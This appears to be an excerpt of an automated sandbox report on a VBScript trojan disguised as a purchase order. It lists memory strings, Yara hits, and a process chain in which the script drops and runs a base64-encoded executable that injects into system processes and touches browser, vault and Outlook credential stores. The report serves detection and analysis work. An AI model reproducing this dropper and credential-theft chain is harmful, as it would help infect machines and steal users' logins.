            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=waytoocool.life&utm
            Source: JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff)
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2)
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/css/vendor-1.css?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/101domain-logo.svg
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/com.png
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/google-reviews.svg
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/google_workspace.png
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/icon/101domain.ico
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.jpg
            Source: JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.webp
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/images/vendor-1/trustpilot.svg
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/js/jquery-3.6.0.min.js?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/js/modernizr-webp.js?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://park.101datacenter.net/js/pricing.js?20241209054434
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-pag
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/external_links.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/gmail_email_aliases.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/resource_center.htm
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=wa
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101

            E-Banking Fraud

            Source: Yara match | File source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: x.exe.0.dr, -Module-.cs | Large array initialization: _003CModule_003E: array initializer size 73616
            Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
            Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: PO1341489LTB GROUP.vbs | Initial sample: Strings found which are bigger than 50
            Source: x.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winVBS@9/3@8/6
            Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: NULL
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs"
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: chkntfs.exe, 00000006.00000002.3303352157.0000000002734000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002711000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2518800826.0000000002706000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002706000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2518598190.00000000026E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO1341489LTB GROUP.vbs | Virustotal: Detection: 26%
            Source: PO1341489LTB GROUP.vbs | ReversingLabs: Detection: 21%
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe | Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: chkntfs.pdbGCTL source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JogKDBeJAc.exe, 00000005.00000002.3304097784.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp, JogKDBeJAc.exe, 00000007.00000002.3303611302.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: aspnet_compiler.pdb source: chkntfs.exe, 00000006.00000002.3305493710.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002688000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000000.2407341039.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.000000001578C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BNXCNJ22333.pdb source: wscript.exe, 00000000.00000003.2078207053.000001B7B4DE4000.00000004.00000020.00020000.00000000.sdmp, x.exe.0.dr

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe", "1", "true");ISWbemServicesEx.ExecQuery("Select * from Win32_BIOS");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("text");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANtlBpcAAAAAAAAAAOAAIgALATAAABQFAAAIAAAAAAAArjM");_Stream.Type("1");_Stream.Open();IXMLDOMElement.nodeTypedValue();_Stream.Write("Unsupported parameter type 00002011");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "x.exe");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\x.exe", "2");_Stream.Close();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\x.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\x.exe", "1", "true");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\x.exe")
            Source: x.exe.0.dr Static PE information: 0x970665DB [Sun Apr 17 03:28:27 2050 UTC]
            Source: x.exe.0.dr Static PE information: section name: .text entropy: 7.913576675327169
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\x.exe
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: NOOPENFILEERRORBOX
